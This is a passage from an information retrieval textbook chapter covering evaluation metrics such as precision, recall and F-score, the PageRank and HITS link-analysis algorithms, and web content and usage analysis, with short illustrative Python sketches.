Without proper evaluation techniques, one cannot compare and measure the rele-
vance of different retrieval models and IR systems in order to make improvements.


Evaluation techniques of IR systems measure the topical relevance and user
relevance. Topical relevance measures the extent to which the topic of a result
matches the topic of the query. Mapping one’s information need with “perfect”
queries is a cognitive task, and many users are not able to effectively form queries
that would retrieve results more suited to their information need. Also, since a
major chunk of user queries are informational in nature, there is no fixed set of
right answers to show to the user. User relevance is a term used to describe the
“goodness” of a retrieved result with regard to the user’s information need. User rel-
evance includes other implicit factors, such as user perception, context, timeliness,
the user’s environment, and current task needs. Evaluating user relevance may also
involve subjective analysis and study of user retrieval tasks to capture some of the
properties of implicit factors involved in accounting for users’ bias for judging
performance.

In Web information retrieval, no binary classification decision is made on whether a
document is relevant or nonrelevant to a query (whereas the Boolean (or binary)
retrieval model uses this scheme, as we discussed in Section 2.1). Instead, a ranking
of the documents is produced for the user. Therefore, some evaluation measures
focus on comparing different rankings produced by IR systems. We discuss some of
these measures next.

6.1 Recall and Precision
Recall and precision metrics are based on the binary relevance assumption (whether
each document is relevant or nonrelevant to the query). Recall is defined as the
number of relevant documents retrieved by a search divided by the total number of
existing relevant documents. Precision is defined as the number of relevant docu-
ments retrieved by a search divided by the total number of documents retrieved by
that search. Figure 5 is a pictorial representation of the terms retrieved vs. relevant
and shows how search results relate to four different sets of documents.

Figure 5
Retrieved vs. relevant search results.

                         Relevant?
                         Yes                    No
Retrieved?   Yes         Hits (TP)              False Alarms (FP)
             No          Misses (FN)            Correct Rejections (TN)


Table 2 Precision and Recall for Ranked Retrieval

Doc. No.   Rank Position i   Relevant   Precision(i)    Recall(i)
10         1                 Yes        1/1 = 100%      1/10 = 10%
2          2                 Yes        2/2 = 100%      2/10 = 20%
3          3                 Yes        3/3 = 100%      3/10 = 30%
5          4                 No         3/4 = 75%       3/10 = 30%
17         5                 No         3/5 = 60%       3/10 = 30%
34         6                 No         3/6 = 50%       3/10 = 30%
215        7                 Yes        4/7 = 57.1%     4/10 = 40%
33         8                 Yes        5/8 = 62.5%     5/10 = 50%
45         9                 No         5/9 = 55.5%     5/10 = 50%
16         10                Yes        6/10 = 60%      6/10 = 60%

The notation for Figure 5 is as follows:

■ TP: true positive

■ FP: false positive

■ FN: false negative

■ TN: true negative

The terms true positive, false positive, false negative, and true negative are generally
used in any type of classification tasks to compare the given classification of an item
with the desired correct classification. Using the term hits for the documents that
truly or “correctly” match the user request, we can define:

Recall = |Hits|/|Relevant|

Precision = |Hits|/|Retrieved|

Recall and precision can also be defined in a ranked retrieval setting. The Recall at
rank position i for document di^q (denoted by r(i)), where di^q is the retrieved document at
position i for query q, is the fraction of relevant documents from d1^q to di^q in the
result set for the query. Let the set of relevant documents from d1^q to di^q in that set
be Si with cardinality |Si|. Let |Dq| be the number of relevant documents for the query
(in this case, |Si| ≤ |Dq|). Then:

Recall r(i) = |Si|/|Dq|

The Precision at rank position i or document di^q (denoted by p(i)) is the fraction of
documents from d1^q to di^q in the result set that are relevant:

Precision p(i) = |Si|/i

Table 2 illustrates the p(i), r(i), and average precision (discussed in the next
section) metrics. It can be seen that recall can be increased by presenting more
results to the user, but this approach runs the risk of decreasing the precision. In the
example, the number of relevant documents for some query = 10. The rank posi-
tion and the relevance of an individual document are shown. The precision and
recall value can be computed at each position within the ranked list as shown in the
last two columns.
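The precision and recall columns of Table 2 can be reproduced with a short sketch; the relevance list below is the Relevant column of the table, and the total number of relevant documents for the query is 10:

def precision_recall_at_ranks(relevance, total_relevant):
    """relevance: list of booleans in rank order; returns (p(i), r(i)) per position."""
    results = []
    hits = 0
    for i, rel in enumerate(relevance, start=1):
        hits += rel
        results.append((hits / i, hits / total_relevant))
    return results

# Relevance column of Table 2, in rank order.
relevance = [True, True, True, False, False, False, True, True, False, True]
for i, (p, r) in enumerate(precision_recall_at_ranks(relevance, total_relevant=10), start=1):
    print(f"rank {i}: precision {p:.3f}, recall {r:.3f}")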

6.2 Average Precision
Average precision is computed based on the precision at each relevant document in
the ranking. This measure is useful for computing a single precision value to com-
pare different retrieval algorithms on a query q:

Pavg = (Σdi^q∈Dq p(i)) / |Dq|

Consider the sample precision values of relevant documents in Table 2. The average
precision (Pavg value) for the example in Table 2 is [P(1) + P(2) + P(3) + P(7) + P(8)
+ P(10)]/6 = 79.93 percent (only relevant documents are considered in this calcula-
tion). Many good algorithms tend to have high top-k average precision for small
values of k, with correspondingly low values of recall.
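Average precision for the same ranking, following the worked example above (averaging p(i) over the relevant documents that appear in the ranking), can be sketched as:

def average_precision(relevance):
    """Average of p(i) taken at the positions of relevant documents in the ranking."""
    hits = 0
    precisions = []
    for i, rel in enumerate(relevance, start=1):
        if rel:
            hits += 1
            precisions.append(hits / i)
    return sum(precisions) / len(precisions) if precisions else 0.0

relevance = [True, True, True, False, False, False, True, True, False, True]
print(round(100 * average_precision(relevance), 2))
# 79.94 (the 79.93 percent above comes from the rounded percentages in Table 2)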

6.3 Recall/Precision Curve
A recall/precision curve can be drawn based on the recall and precision values at
each rank position, where the x-axis is the recall and the y-axis is the precision.
Instead of using the precision and recall at each rank position, the curve is com-
monly plotted using recall levels r(i) at 0 percent, 10 percent, 20 percent…100 per-
cent. The curve usually has a negative slope, reflecting the inverse relationship
between precision and recall.
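
A sketch of how the points of such a curve can be produced is shown below. The eleven
standard recall levels and the interpolation rule (take the highest precision observed at
any recall at or above the level) are common conventions assumed here; the text itself does
not prescribe a particular interpolation method.

    # (r(i), p(i)) pairs from the ranked example of Table 2.
    ranked_relevance = [True, True, True, False, False, False, True, True, False, True]
    total_relevant = 10
    pairs, hits = [], 0
    for i, rel in enumerate(ranked_relevance, start=1):
        hits += rel
        pairs.append((hits / total_relevant, hits / i))

    # Interpolated precision at recall levels 0%, 10%, ..., 100%.
    for level in [x / 10 for x in range(11)]:
        candidates = [p for r, p in pairs if r >= level]
        p_interp = max(candidates) if candidates else 0.0
        print(f"recall level {level:.1f}: interpolated precision = {p_interp:.3f}")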

6.4 F-Score
F-score (F) is the harmonic mean of the precision (p) and recall (r) values. High
precision is almost always achieved at the expense of recall, and vice versa. It is a
matter of the application's context whether to tune the system for high precision or
high recall. F-score is a single measure that combines precision and recall to compare
different result sets:

F = 2 / (1/p + 1/r) = 2pr / (p + r)

One of the properties of the harmonic mean is that it tends to be closer to the smaller
of the two numbers being averaged. Thus F is automatically biased toward the smaller of
the precision and recall values. Therefore, for a high F-score, both precision and
recall must be high.
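
A small sketch of the F-score computation (the precision and recall values are illustrative
only):

    def f_score(p, r):
        # Harmonic mean of precision p and recall r; defined as 0 when both are 0.
        return 2 * p * r / (p + r) if (p + r) > 0 else 0.0

    print(f_score(0.75, 0.30))   # about 0.43: pulled toward the smaller of the two values
    print(f_score(0.75, 0.75))   # 0.75: a high F-score requires both p and r to be high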


7 Web Search and Analysis22

The emergence of the Web has brought millions of users to search for information,
which is stored in a very large number of active sites. To make this information acces-
sible, search engines such as Google and Yahoo! have to crawl and index these sites
and document collections in their index databases. Moreover, search engines have to
regularly update their indexes given the dynamic nature of the Web as new Web sites
are created and current ones are updated or deleted. Since there are many millions of
pages available on the Web on different topics, search engines have to apply many
sophisticated techniques such as link analysis to identify the importance of pages.

There are other types of search engines besides the ones that regularly crawl the Web
and create automatic indexes: human-powered directories, vertical search engines, and
metasearch engines. Human-powered search engines are developed with the help of
computer-assisted systems that aid curators in assigning indexes; they consist of
manually created, specialized Web directories that are hierarchically organized
indexes to guide user navigation to different resources on the Web. Vertical search
engines are customized topic-specific search engines that crawl and index a specific
collection of documents on the Web and provide search results from that specific
collection. Metasearch engines are built on top of other search engines: they query
different search engines simultaneously and aggregate and present the search results
from these sources.

Another source of searchable Web documents is digital libraries. Digital libraries
can be broadly defined as collections of electronic resources and services for the
delivery of materials in a variety of formats. These collections may include a univer-
sity’s library catalog, catalogs from a group of participating universities as in the
State of Florida University System, or a compilation of multiple external resources
on the World Wide Web such as Google Scholar or the IEEE/ACM index. These
interfaces provide universal access to different types of content—such as books,
articles, audio, and video—situated in different database systems and remote repos-
itories. Similar to real libraries, these digital collections are maintained via a catalog
and organized in categories for online reference. Digital libraries “include personal,
distributed, and centralized collections such as online public access catalogs
(OPACs) and bibliographic databases, distributed document databases, scholarly
and professional discussion lists and electronic journals, other online databases,
forums, and bulletin boards.” 23

22The contributions of Pranesh P. Ranganathan and Hari P. Kumar to this section are appreciated.
23Covi and Kling (1996), page 672.

7.1 Web Analysis and Its Relationship to Information Retrieval

In addition to browsing and searching the Web, another important activity closely
related to information retrieval is to analyze or mine information on the Web for
new information of interest. Application of data analysis techniques for discovery
and analysis of useful information from the Web is known as Web analysis. Over
the past few years the World Wide Web has emerged as an important repository of
information for many day-to-day applications for individual consumers, as well as a
significant platform for e-commerce and for social networking. These properties
make it an interesting target for data analysis applications. The Web mining and
analysis field is an integration of a wide range of fields spanning information
retrieval, text analysis, natural language processing, data mining, machine learning,
and statistical analysis.

The goals of Web analysis are to improve and personalize search results relevance
and to identify trends that may be of value to various businesses and organizations.
We elaborate on these goals next.

■ Finding relevant information. People usually search for specific information
on the Web by entering keywords in a search engine or by browsing information
portals and using their services. Search services are constrained by search
relevance problems, since they must map and approximate the information needs of
millions of users as an a priori task. Low precision (see Section 6) results when
many of the retrieved documents are not relevant to the user. On the Web, high
recall (see Section 6) is impossible to verify because there is no way to index
all the pages on the Web; measuring recall is also of limited use, since the user
is concerned with only the top few documents. The most relevant feedback for the
user typically comes from only the top few results.

■ Personalization of the information. Different people have different content
and presentation preferences. Pages can be personalized for a user by collecting
personal information and then generating user-specific dynamic Web pages. The
customization tools used in various Web-based applications and services, such as
click-through monitoring, eyeball tracking, explicit or implicit user profile
learning, and dynamic service composition using Web APIs, support this service
adaptation and personalization. A personalization engine typically has algorithms
that make use of the user's personalization information, collected by these tools,
to generate user-specific search results.

■ Finding information of commercial value. This problem deals with finding
interesting patterns in users' interests, behaviors, and use of products and
services that may be of commercial value. For example, businesses in industries
such as automobiles, clothing, shoes, and cosmetics may improve their services by
identifying usage trends and user preferences through various Web analysis
techniques.

Based on the above goals, we can classify Web analysis into three categories: Web
content analysis, which deals with extracting useful information/knowledge from
Web page contents; Web structure analysis, which discovers knowledge from
hyperlinks representing the structure of the Web; and Web usage analysis, which
mines user access patterns from usage logs that record the activity of every user.


7.2 Searching the Web
The World Wide Web is a huge corpus of information, but locating resources that
are both high quality and relevant to the needs of the user is very difficult. The set of
Web pages taken as a whole has almost no unifying structure, with variability in
authoring style and content, thereby making it more difficult to precisely locate
needed information. Index-based search engines have been one of the prime tools
by which users search for information on the Web. Web search engines crawl the
Web and create an index to the Web for searching purposes. When a user specifies
his need for information by supplying keywords, these Web search engines query
their repository of indexes and produce links or URLs with abbreviated content as
search results. There may be thousands of pages relevant to a particular query; the
challenge is to return only the few most relevant results to the user. The discussion
of querying and relevance-based ranking in IR systems in Sections 2 and 3 applies to
Web search engines as well; in addition, their ranking algorithms exploit the link
structure of the Web.

Web pages, unlike standard text collections, contain connections to other Web pages
or documents (via the use of hyperlinks), allowing users to browse from page to
page. A hyperlink has two components: a destination page and an anchor text
describing the link. For example, a person can link to the Yahoo! Website on his Web
page with anchor text such as “My favorite Website.” Anchor texts can be thought of
as being implicit endorsements. They provide very important latent human annota-
tion. A person linking to other Web pages from his Web page is assumed to have
some relation to those Web pages. Web search engines aim to distill results per their
relevance and authority. There are many redundant hyperlinks, like the links to the
homepage on every Web page of the Web site. Such hyperlinks must be eliminated
from the search results by the search engines.

A hub is a Web page or a Website that links to a collection of prominent sites
(authorities) on a common topic. A good authority is a page that is pointed to by
many good hubs, while a good hub is a page that points to many good authorities.
These ideas are used by the HITS ranking algorithm, which is described in Section
7.3. It is often found that authoritative pages are not very self-descriptive, and
authorities on broad topics seldom link directly to one another. These properties of
hyperlinks are being actively used to improve Web search engine result ranking and
organize the results as hubs and authorities. We briefly discuss a couple of ranking
algorithms below.
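
The mutual reinforcement between hubs and authorities can be sketched in a few lines of
Python. The toy link graph and the fixed number of iterations are assumptions for
illustration; the full HITS procedure, including the sampling step and the convergence
test, is described in Section 7.3.

    # Toy link graph (hypothetical page identifiers): page -> pages it points to.
    links = {"a": ["x", "y"], "b": ["x", "y", "z"], "c": ["y"], "x": [], "y": [], "z": []}
    pages = list(links)
    hub = {p: 1.0 for p in pages}
    auth = {p: 1.0 for p in pages}

    for _ in range(20):   # a fixed iteration count stands in for a convergence test
        # Authority value: sum of the hub values of the pages pointing to the page.
        auth = {p: sum(hub[q] for q in pages if p in links[q]) for p in pages}
        # Hub value: sum of the authority values of the pages the page points to.
        hub = {p: sum(auth[q] for q in links[p]) for p in pages}
        # Normalize so that the hub values and the authority values each sum to 1.
        h_total, a_total = sum(hub.values()), sum(auth.values())
        hub = {p: v / h_total for p, v in hub.items()}
        auth = {p: v / a_total for p, v in auth.items()}

    print(sorted(auth.items(), key=lambda kv: -kv[1])[:3])   # y and x emerge as the top authorities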

7.3 Analyzing the Link Structure of Web Pages
The goal of Web structure analysis is to generate a structural summary of Websites
and Web pages. It focuses on the inner structure of documents and deals
with the link structure using hyperlinks at the interdocument level. The structure
and content of Web pages are often combined for information retrieval by Web
search engines. Given a collection of interconnected Web documents, interesting
and informative facts describing their connectivity in the Web subset can be discov-
ered. Web structure analysis is also used to reveal the structure of Web pages, which
helps with navigation and makes it possible to compare/integrate Web page
schemes. This aspect of Web structure analysis facilitates Web document classifica-
tion and clustering on the basis of structure.

The PageRank Ranking Algorithm. As discussed earlier, ranking algorithms are
used to order search results based on relevance and authority. Google uses the well-
known PageRank algorithm,24 which is based on the “importance” of each page.
Every Web page has a number of forward links (out-edges) and backlinks (in-
edges). It is very difficult to determine all the backlinks of a Web page, while it is rel-
atively straightforward to determine its forward links. According to the PageRank
algorithm, highly linked pages are more important (have greater authority) than
pages with fewer links. However, not all backlinks are important. A backlink to a
page from a credible source is more important than a link from some arbitrary
page. Thus a page has a high rank if the sum of the ranks of its backlinks is high.
PageRank was an attempt to see how good an approximation to the “importance” of
a page can be obtained from the link structure.
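
As a concrete illustration, here is a minimal, simplified sketch of the iterative
computation described next. The toy link graph is hypothetical, d is set to 0.85, and
every page is assumed to have at least one outgoing link; production implementations must
also handle dangling pages and the scale of the real Web.

    # Simplified PageRank iteration: P(A) = (1 - d) + d * sum(P(Ti)/C(Ti)) over the
    # pages Ti that link to A, where C(Ti) is the number of out-links of Ti.
    links = {"A": ["B", "C"], "B": ["C"], "C": ["A"], "D": ["C"]}   # hypothetical toy graph
    d = 0.85                                                        # damping factor
    pr = {page: 1.0 for page in links}                              # initial PageRank values

    for _ in range(50):                 # iterate until the values stabilize (fixed count here)
        new_pr = {}
        for page in links:
            backlinks = [q for q in links if page in links[q]]
            new_pr[page] = (1 - d) + d * sum(pr[q] / len(links[q]) for q in backlinks)
        pr = new_pr

    print(pr)   # page C, with the most backlinks, ends up with the highest rank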

The computation of page ranking follows an iterative approach. PageRank of a Web
page is calculated as a sum of the PageRanks of all its backlinks. PageRank treats the
Web like a Markov model. An imaginary Web surfer visits an infinite string of pages
by clicking randomly. The PageRank of a page is an estimate of how often the surfer
winds up at a particular page. PageRank is a measure of query-independent impor-
tance of a page/node. For example, let P(X) be the PageRank of any page X and C(X)
be the number of outgoing links from page X, and let d be the damping factor in the
range 0 < d < 1. Usually d is set to 0.85. Then the PageRank for a page A can be
calculated as:

P(A) = (1 – d) + d (P(T1)/C(T1) + ... + P(Tn)/C(Tn))

Here T1, T2, ..., Tn are the pages that point to page A (that is, they are citations to
page A). PageRank forms a probability distribution over Web pages, so the sum of all Web
pages' PageRanks is one.

The HITS Ranking Algorithm. The HITS25 algorithm proposed by Jon Kleinberg is another
type of ranking algorithm exploiting the link structure of the Web. The algorithm
presumes that a good hub is a document that points to many hubs, and a good authority is
a document that is pointed at by many other authorities. The algorithm contains two main
steps: a sampling component and a weight-propagation component. The sampling component
constructs a focused collection S of pages with the following properties:

1. S is relatively small.
2. S is rich in relevant pages.
3. S contains most (or a majority) of the strongest authorities.

The weight-propagation component recursively calculates the hub and authority values for
each document as follows:

1. Initialize the hub and authority values for all pages in S by setting them to 1.
2. While the hub and authority values do not converge:
   a. For each page in S, set its authority value to the sum of the hub values of all
      pages pointing to it.
   b. For each page in S, set its hub value to the sum of the authority values of all
      pages it points to.
   c. Normalize the hub and authority values so that the sum of all hub values in S
      equals 1 and the sum of all authority values in S equals 1.

24The PageRank algorithm was proposed by Lawrence Page (1998) and Sergey Brin, founders of Google. For more information, see http://en.wikipedia.org/wiki/PageRank.
25See Kleinberg (1999).

7.4 Web Content Analysis
As mentioned earlier, Web content analysis refers to the process of discovering useful
information from Web content/data/documents. Web content data consists of unstructured
data such as free text from electronically stored documents; semistructured data,
typically found as HTML documents with embedded image data; and more structured data
such as tabular data and pages in HTML, XML, or other markup languages generated as
output from databases. More generally, the term Web content refers to any real data in a
Web page that is intended for the user accessing that page. This usually consists of,
but is not limited to, text and graphics. We first discuss some preliminary Web content
analysis tasks and then look at the traditional analysis tasks of Web page
classification and clustering.

Structured Data Extraction. Structured data on the Web is often very important because
it represents essential information, such as a structured table showing the airline
flight schedule between two cities. There are several approaches to structured data
extraction. One is to write a wrapper, a program that looks for different structural
characteristics of the information on the page and extracts the right content. Another
approach is to manually write an extraction program for each Website based on observed
format patterns of the site, which is very labor intensive and time consuming; it does
not scale to a large number of sites.
A third approach is wrapper induction or wrapper learning, where the user first manually labels a set of train- ing set pages, and the learning system generates rules—based on the learning pages—that are applied to extract target items from other Web pages. A fourth approach is the automatic approach, which aims to find patterns/grammars from the Web pages and then uses wrapper generation to produce a wrapper to extract data automatically. Web Information Integration. The Web is immense and has millions of docu- ments, authored by many different persons and organizations. Because of this, Web pages that contain similar information may have different syntax and different words that describe the same concepts. This creates the need for integrating 1021 Introduction to Information Retrieval and Web Search information from diverse Web pages. Two popular approaches for Web information integration are: 1. Web query interface integration, to enable querying multiple Web data- bases that are not visible in external interfaces and are hidden in the “deep Web.” The deep Web26 consists of those pages that do not exist until they are created dynamically as the result of a specific database search, which pro- duces some of the information in the page. Since traditional search engine crawlers cannot probe and collect information from such pages, the deep Web has heretofore been hidden from crawlers. 2. Schema matching, such as integrating directories and catalogs to come up with a global schema for applications. An example of such an application would be to combine a personal health record of an individual by matching and collecting data from various sources dynamically by cross-linking health records from multiple systems. These approaches remain an area of active research and a detailed discussion of them is beyond the scope of this book. Consult the Selected Bibliography at the end of this chapter for further details. Ontology-Based Information Integration. This task involves using ontologies to effectively combine information from multiple heterogeneous sources. Ontologies—formal models of representation with explicitly defined concepts and named relationships linking them—are used to address the issues of semantic het- erogeneity in data sources. Different classes of approaches are used for information integration using ontologies. ■ Single ontology approaches use one global ontology that provides a shared vocabulary for the specification of the semantics. They work if all informa- tion sources to be integrated provide nearly the same view on a domain of knowledge. For example, UMLS (described in Section 4.3) can serve as a common ontology for biomedical applications. ■ In a multiple ontology approach, each information source is described by its own ontology. In principle, the “source ontology” can be a combination of several other ontologies but it cannot be assumed that the different “source ontologies” share the same vocabulary. Dealing with multiple, partially over- lapping, and potentially conflicting ontologies is a very difficult problem faced by many applications, including those in bioinformatics and other complex area of knowledge. ■ Hybrid ontology approaches are similar to multiple ontology approaches: the semantics of each source is described by its own ontology. But in order to make the source ontologies comparable to each other, they are built upon one global shared vocabulary. The shared vocabulary contains basic terms (the primitives) of a domain of knowledge. 
Because each term of source 26The deep Web as defined by Bergman (2001). 1022 Introduction to Information Retrieval and Web Search ontology is based on the primitives, the terms become more easily compara- ble than in multiple ontology approaches. The advantage of a hybrid approach is that new sources can be easily added without the need to modify the mappings or the shared vocabulary. In multiple and hybrid approaches, several research issues, such as ontology mapping, alignment, and merging, need to be addressed. Building Concept Hierarchies. One common way of organizing search results is via a linear ranked list of documents. But for some users and applications, a better way to display results would be to create groupings of related documents in the search result. One way of organizing documents in a search result, and for organiz- ing information in general, is by creating a concept hierarchy. The documents in a search result are organized into groups in a hierarchical fashion. Other related tech- niques to organize docments are through classification and clustering. Clustering creates groups of documents, where the documents in each group share many com- mon concepts. Segmenting Web Pages and Detecting Noise. There are many superfluous parts in a Web document, such as advertisements and navigation panels. The infor- mation and text in these superfluous parts should be eliminated as noise before classifying the documents based on their content. Hence, before applying classifica- tion or clustering algorithms to a set of documents, the areas or blocks of the docu- ments that contain noise should be removed. 7.5 Approaches to Web Content Analysis The two main approaches to Web content analysis are (1) agent based (IR view) and (2) database based (DB view). The agent-based approach involves the development of sophisticated artificial intelligence systems that can act autonomously or semi-autonomously on behalf of a particular user, to discover and process Web-based information. Generally, the agent-based Web analysis systems can be placed into the following three categories: ■ Intelligent Web agents are software agents that search for relevant informa- tion using characteristics of a particular application domain (and possibly a user profile) to organize and interpret the discovered information. For example, an intelligent agent that retrieves product information from a vari- ety of vendor sites using only general information about the product domain. ■ Information Filtering/Categorization is another technique that utilizes Web agents for categorizing Web documents. These Web agents use methods from information retrieval, and semantic information based on the links among various documents to organize documents into a concept hierarchy. ■ Personalized Web agents are another type of Web agents that utilize the per- sonal preferences of users to organize search results, or to discover informa- tion and documents that could be of value for a particular user. User 1023 Introduction to Information Retrieval and Web Search preferences could be learned from previous user choices, or from other indi- viduals who are considered to have similar preferences to the user. The database-based approach aims to infer the structure of the Website or to trans- form a Web site to organize it as a database so that better information management and querying on the Web become possible. 
This approach of Web content analysis primarily tries to model the data on the Web and integrate it so that more sophisti- cated queries than keyword-based search can be performed. These could be achieved by finding the schema of Web documents, building a Web document ware- house, a Web knowledge base, or a virtual database. The database-based approach may use a model such as the Object Exchange Model (OEM)27 that represents semi- structured data by a labeled graph. The data in the OEM is viewed as a graph, with objects as the vertices and labels on the edges. Each object is identified by an object identifier and a value that is either atomic—such as integer, string, GIF image, or HTML document—or complex in the form of a set of object references. The main focus of the database-based approach has been with the use of multilevel databases and Web query systems. A multilevel database at its lowest level is a data- base containing primitive semistructured information stored in various Web repos- itories, such as hypertext documents. At the higher levels, metadata or generalizations are extracted from lower levels and organized in structured collec- tions such as relational or object-oriented databases. In a Web query system, infor- mation about the content and structure of Web documents is extracted and organized using database-like techniques. Query languages similar to SQL can then be used to search and query Web documents. They combine structural queries, based on the organization of hypertext documents, and content-based queries. 7.6 Web Usage Analysis Web usage analysis is the application of data analysis techniques to discover usage patterns from Web data, in order to understand and better serve the needs of Web- based applications. This activity does not directly contribute to information retrieval; but it is important to improve or enhance the users’ search experience. Web usage data describes the pattern of usage of Web pages, such as IP addresses, page references, and the date and time of accesses for a user, user group, or an appli- cation. Web usage analysis typically consists of three main phases: preprocessing, pattern discovery, and pattern analysis. 1. Preprocessing. Preprocessing converts the information collected about usage statistics and patterns into a form that can be utilized by the pattern discovery methods. We use the term “page view” to refer to pages viewed or visited by a user. There are several different types of preprocessing tech- niques available: ■ Usage preprocessing analyzes the available collected data about usage pat- terns of users, applications, and groups of users. Because this data is often incomplete, the process is difficult. Data cleaning techniques are necessary to 27See Kosala and Blockeel (2000). 1024 Introduction to Information Retrieval and Web Search eliminate the impact of irrelevant items in the analysis result. Frequently, usage data is identified by an IP address, and consists of clicking streams that are collected at the server. Better data is available if a usage tracking process is installed at the client site. ■ Content preprocessing is the process of converting text, image, scripts and other content into a form that can be used by the usage analysis. Often, this consists of performing content analysis such as classification or clustering. 
The clustering or classification techniques can group usage information for similar types of Web pages, so that usage patterns can be discovered for spe- cific classes of Web pages that describe particular topics. Page views can also be classified according to their intended use, such as for sales or for discovery or for other uses. ■ Structure preprocessing: The structure preprocessing can be done by pars- ing and reformatting the information about hyperlinks and structure between viewed pages. One difficulty is that the site structure may be dynamic and may have to be constructed for each server session. 2. Pattern Discovery The techniques that are used in pattern discovery are based on methods from the fields of statistics, machine learning, pattern recognition, data analysis, data mining, and other similar areas. These techniques are adapted so they take into consideration the specific knowledge and characteristics for Web Analysis. For example, in association rule discovery, the notion of a transaction for market-basket analysis considers the items to be unordered. But the order of accessing of Web pages is important, and so it should be considered in Web usage analysis. Hence, pattern discovery involves mining sequences of page views. In general, using Web usage data, the following types of data mining activities may be performed for pattern discovery. ■ Statistical analysis. Statistical techniques are the most common method to extract knowledge about visitors to a Website. By analyzing the session log, it is possible to apply statistical measures such as mean, median, and frequency count to parameters such as pages viewed, viewing time per page, length of navigation paths between pages, and other parameters that are relevant to Web usage analysis. ■ Association rules. In the context of Web usage analysis, association rules refer to sets of pages that are accessed together with a support value exceed- ing some specified threshold. These pages may not be directly connected to one another via hyperlinks. For example, association rule discovery may reveal a correlation between users who visited a page containing electronic products to those who visit a page about sporting equipment. ■ Clustering. In the Web usage domain, there are two kinds of interesting clusters to be discovered: usage clusters and page clusters. Clustering of users tends to establish groups of users exhibiting similar browsing patterns. 1025 Introduction to Information Retrieval and Web Search Such knowledge is especially useful for inferring user demographics in order to perform market segmentation in E-commerce applications or provide personalized Web content to the users. Clustering of pages is based on the content of the pages, and pages with similar contents are grouped together. This type of clustering can be utilized in Internet search engines, and in tools that provide assistance to Web browsing. ■ Classification. In the Web domain, one goal is to develop a profile of users belonging to a particular class or category. This requires extraction and selection of features that best describe the properties of a given class or cate- gory of users. As an example, an interesting pattern that may be discovered would be: 60% of users who placed an online order in /Product/Books are in the 18-25 age group and live in rented apartments. ■ Sequential patterns. These kinds of patterns identify sequences of Web accesses, which may be used to predict the next set of Web pages to be accessed by a certain class of users. 
These patterns can be used by marketers to produce targeted advertisements on Web pages. Another type of sequen- tial pattern pertains to which items are typically purchased following the purchase of a particular item. For example, after purchasing a computer, a printer is often purchased ■ Dependency modeling. Dependency modeling aims to determine and model significant dependencies among the various variables in the Web domain. As an example, one may be interested to build a model representing the different stages a visitor undergoes while shopping in an online store based on the actions chosen (e.g., from a casual visitor to a serious potential buyer). 3. Pattern Analysis The final step is to filter out those rules or patterns that are considered to be not of interest from the discovered patterns. The particular analysis method- ology based on the application. One common technique for pattern analysis is to use a query language such as SQL to detect various patterns and rela- tionships. Another technique involves loading of usage data into a data ware- house with ETL tools and performing OLAP operations to view it along multiple dimensions. It is common to use visualization techniques, such as graphing patterns or assigning colors to different values, to highlight pat- terns or trends in the data. 7.7 Practical Applications of Web Analysis Web Analytics. The goal of web analytics is to understand and optimize the per- formance of Web usage. This requires collecting, analyzing, and performance mon- itoring of Internet usage data. On-site Web analytics measures the performance of a Website in a commercial context. This data is typically compared against key per- formance indicators to measure effectiveness or performance of the Website as a whole, and can be used to improve a Website or improve the marketing strategies. 1026 Introduction to Information Retrieval and Web Search Web Spamming. It has become increasingly important for companies and indi- viduals to have their Websites/Web pages appear in the top search results. To achieve this, it is essential to understand search engine ranking algorithms and to present the information in one’s page in such a way that the page is ranked high when the respective keywords are queried. There is a thin line separating legitimate page opti- mization for business purposes and spamming. Web Spamming is thus defined as a deliberate activity to promote one’s page by manipulating the results returned by the search engines. Web analysis may be used to detect such pages and discard them from search results. Web Security. Web analysis can be used to find interesting usage patterns of Websites. If any flaw in a Website has been exploited, it can be inferred using Web analysis thereby allowing the design of more robust Websites. For example, the backdoor or information leak of Web servers can be detected by using Web analysis techniques on some abnormal Web application log data. Security analysis tech- niques such as intrusion detection and denial of service attacks are based on Web access pattern analysis. Web Crawlers. Web crawlers are programs that visit Web pages and create copies of all the visited pages so they can be processed by a search engine for indexing the downloaded pages to provide fast searches. Another use of crawlers is to automati- cally check and maintain the Websites. For example, the HTML code and the links in a Website can be checked and validated by the crawler. 
Another unfortunate use of crawlers is to collect e-mail addresses from Web pages, so they can be used for spam e-mails later. 8 Trends in Information Retrieval In this section we review a few concepts that are being considered in more recent research work in information retrieval. 8.1 Faceted Search Faceted Search is a technique that allows for integrated search and navigation expe- rience by allowing users to explore by filtering available information. This search technique is used often in ecommerce Websites and applications enabling users to navigate a multi-dimensional information space. Facets are generally used for han- dling three or more dimensions of classification. This allows the faceted classifica- tion scheme to classify an object in various ways based on different taxonomical criteria. For example, a Web page may be classified in various ways: by content (air- lines, music, news, ...); by use (sales, information, registration, ...); by location; by language used (HTML, XML, ...) and in other ways or facets. Hence, the object can be classified in multiple ways based on multiple taxonomies. A facet defines properties or characteristics of a class of objects. The properties should be mutually exclusive and exhaustive. For example, a collection of art objects might be classified using an artist facet (name of artist), an era facet (when the art 1027 Introduction to Information Retrieval and Web Search was created), a type facet (painting, sculpture, mural, ...), a country of origin facet, a media facet (oil, watercolor, stone, metal, mixed media, ...), a collection facet (where the art resides), and so on. Faceted search uses faceted classification that enables a user to navigate information along multiple paths corresponding to different orderings of the facets. This con- trasts with traditional taxonomies in which the hierarchy of categories is fixed and unchanging. University of California, Berkeley’s Flamenco project28 is one of the earlier examples of a faceted search system. 8.2 Social Search The traditional view of Web navigation and browsing assumes that a single user is searching for information. This view contrasts with previous research by library sci- entists who studied users’ information seeking habits. This research demonstrated that additional individuals may be valuable information resources during informa- tion search by a single user. More recently, research indicates that there is often direct user cooperation during Web-based information search. Some studies report that significant segments of the user population are engaged in explicit collabora- tion on joint search tasks on the Web. Active collaboration by multiple parties also occur in certain cases (for example, enterprise settings); at other times, and perhaps for a majority of searches, users often interact with others remotely, asynchronously, and even involuntarily and implicitly. Socially enabled online information search (social search) is a new phenomenon facilitated by recent Web technologies. Collaborative social search involves different ways for active involvement in search-related activities such as co-located search, remote collaboration on search tasks, use of social network for search, use of exper- tise networks, involving social data mining or collective intelligence to improve the search process and even social interactions to facilitate information seeking and sense making. 
